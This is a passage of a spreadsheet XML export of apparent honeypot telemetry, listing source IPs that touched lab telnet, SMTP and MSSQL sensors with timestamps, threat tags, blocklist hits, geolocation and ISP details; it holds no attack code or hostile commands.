    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5240:36cc"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3059"/>
    <x v="3059"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T04:00:53"/>
    <d v="2025-01-15T15:27:20"/>
    <d v="2025-04-05T04:00:53"/>
    <n v="215"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_SMTP_H27&amp;&amp;SMA-LAB_SMTP_H34&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H25&amp;&amp;SMA-LAB_SMTP_H28&amp;&amp;SMA-LAB_SMTP_H33"/>
    <s v="25&amp;&amp;51114&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MO"/>
    <s v="Missouri"/>
    <s v="Jackson"/>
    <s v="Kansas City (Paseo West)"/>
    <s v="4393217"/>
    <s v="64106"/>
    <s v="39.1049"/>
    <s v="-94.568"/>
    <s v="399045"/>
    <s v="DediOutlet, LLC"/>
    <s v="DediOutlet, LLC"/>
    <s v="hosting"/>
    <s v="DediOutlet, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:68a7:df37"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3060"/>
    <x v="3060"/>
    <s v="NA&amp;&amp;syn-104-035-120-102.res.spectrum.com"/>
    <x v="0"/>
    <d v="2025-04-05T04:00:50"/>
    <d v="2025-01-14T05:32:06"/>
    <d v="2025-04-05T04:00:50"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Los Angeles"/>
    <s v="Los Angeles (Canoga Park)"/>
    <s v="5368381"/>
    <s v="91303"/>
    <s v="34.1989"/>
    <s v="-118.597"/>
    <s v="20001"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6823:7866"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3061"/>
    <x v="3061"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T03:52:02"/>
    <d v="2025-01-09T18:15:23"/>
    <d v="2025-04-05T03:52:02"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2012-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:1ee5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3062"/>
    <x v="3062"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T03:21:54"/>
    <d v="2025-04-05T03:21:54"/>
    <d v="2025-04-05T03:21:54"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:e0a5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3063"/>
    <x v="3063"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T03:17:22"/>
    <d v="2025-04-05T03:17:22"/>
    <d v="2025-04-05T03:17:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IE"/>
    <s v="Ireland"/>
    <s v="L"/>
    <s v="Leinster"/>
    <s v="County Wexford"/>
    <s v="Gorey (Gorey corporation lands)"/>
    <s v="2963962"/>
    <s v="Y25"/>
    <s v="52.6771"/>
    <s v="-6.29281"/>
    <s v="201000"/>
    <s v="WHIZZY-FTTX"/>
    <s v="Whizzy Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b959:4b9d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3064"/>
    <x v="3064"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T03:16:23"/>
    <d v="2025-04-05T00:28:35"/>
    <d v="2025-04-05T03:16:23"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="MD"/>
    <s v="Madrid"/>
    <s v="Madrid"/>
    <s v="Chamartin"/>
    <s v="3125239"/>
    <s v="NA"/>
    <s v="40.4621"/>
    <s v="-3.6766"/>
    <s v="15704"/>
    <s v="XTRA TELECOM S.A."/>
    <s v="Xtra Telecom S.A."/>
    <s v="business"/>
    <s v="XFERA Moviles S.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6de3:9f15"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3065"/>
    <x v="3065"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T03:16:16"/>
    <d v="2025-04-05T03:13:40"/>
    <d v="2025-04-05T03:16:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f5:da11"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3066"/>
    <x v="3066"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T02:57:45"/>
    <d v="2025-04-05T02:57:45"/>
    <d v="2025-04-05T02:57:45"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:1bf6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3067"/>
    <x v="3067"/>
    <s v="220-133-142-174.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T02:50:28"/>
    <d v="2024-05-03T22:53:00"/>
    <d v="2025-04-05T02:50:28"/>
    <n v="3363"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H29&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;29858&amp;&amp;23&amp;&amp;NA&amp;&amp;47069&amp;&amp;25083&amp;&amp;47090&amp;&amp;47111&amp;&amp;47100&amp;&amp;47131&amp;&amp;80&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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dc85:8eae"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3068"/>
    <x v="3068"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T02:50:18"/>
    <d v="2025-04-05T02:50:18"/>
    <d v="2025-04-05T02:50:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:8c05"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3069"/>
    <x v="3069"/>
    <s v="NA&amp;&amp;62.42.130.66.dyn.user.ono.com"/>
    <x v="0"/>
    <d v="2025-04-05T02:49:50"/>
    <d v="2025-04-05T01:20:13"/>
    <d v="2025-04-05T02:49:50"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="ES"/>
    <s v="Spain"/>
    <s v="CL"/>
    <s v="Castille and León"/>
    <s v="Palencia"/>
    <s v="Palencia"/>
    <s v="3114531"/>
    <s v="34001"/>
    <s v="42.0095"/>
    <s v="-4.52406"/>
    <s v="6739"/>
    <s v="VODAFONE ONO, S.A."/>
    <s v="Ono"/>
    <s v="business"/>
    <s v="ONO"/>
    <s v="2000-05-03"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-08-02 04:00:00"/>
    <s v="2025-12-14 19:48:41"/>
    <s v="2024-11-04 16:14:55"/>
    <s v="['DNS01.ONO.COM', 'DNS02.ONO.COM', 'DNS03.ONO.COM']"/>
    <s v="Nominalia Internet SL"/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="None"/>
    <x v="34"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3e2a:8242"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3070"/>
    <x v="3070"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T02:35:01"/>
    <d v="2025-04-05T02:35:01"/>
    <d v="2025-04-05T02:35:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b639:b6e7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3071"/>
    <x v="3071"/>
    <s v="c-73-88-104-76.hsd1.sc.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T02:27:53"/>
    <d v="2023-11-26T16:10:17"/>
    <d v="2025-04-05T02:27:53"/>
    <n v="217"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;37492"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="SC"/>
    <s v="South Carolina"/>
    <s v="Berkeley"/>
    <s v="Hanahan"/>
    <s v="4581023"/>
    <s v="29410"/>
    <s v="32.8829"/>
    <s v="-80.0953"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications"/>
    <s v="residential"/>
    <s v="Comcast IP Services, L.L.C."/>
    <s v="2005-04-19"/>
    <s v="CABLE-1"/>
    <s v="2021-01-25"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1997-09-25 04:00:00"/>
    <s v="2025-09-24 04:00:00"/>
    <s v="2024-09-20 05:10:59"/>
    <s v="['DNS101.COMCAST.NET', 'DNS102.COMCAST.NET', 'DNS103.COMCAST.NET', 'DNS104.COMCAST.NET', 'DNS105.COMCAST.NET']"/>
    <s v="CSC Corporate Domains, Inc."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited http://www.icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited http://www.icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited http://www.icann.org/epp#serverUpdateProhibited']"/>
    <s v="Comcast Domains"/>
    <x v="13"/>
    <s v="NA"/>
    <s v="1701 JFK Blvd."/>
    <s v="::ffff:4958:684c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3072"/>
    <x v="3072"/>
    <s v="lo-esr1-74-215-227-186.fuse.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T02:12:13"/>
    <d v="2025-03-12T21:33:21"/>
    <d v="2025-04-05T02:12:13"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IL"/>
    <s v="Illinois"/>
    <s v="Cook"/>
    <s v="Chicago"/>
    <s v="4887398"/>
    <s v="60666"/>
    <s v="41.8781"/>
    <s v="-87.6298"/>
    <s v="6181"/>
    <s v="Cincinnati Bell Telephone Company LLC"/>
    <s v="Fuse Internet Access"/>
    <s v="residential"/>
    <s v="Fuse Internet Access - BRAS W 7th Region"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1995-12-12 05:00:00"/>
    <s v="2025-12-11 05:00:00"/>
    <s v="2024-10-14 06:37:53"/>
    <s v="['NS1.FUSE.NET', 'NS2.FUSE.NET']"/>
    <s v="Network Solutions, LLC"/>
    <s v="clientTransferProhibited https://icann.org/epp#clientTransferProhibited"/>
    <s v="None"/>
    <x v="22"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:4ad7:e3ba"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3073"/>
    <x v="3073"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T01:56:11"/>
    <d v="2025-04-05T01:56:11"/>
    <d v="2025-04-05T01:56:11"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
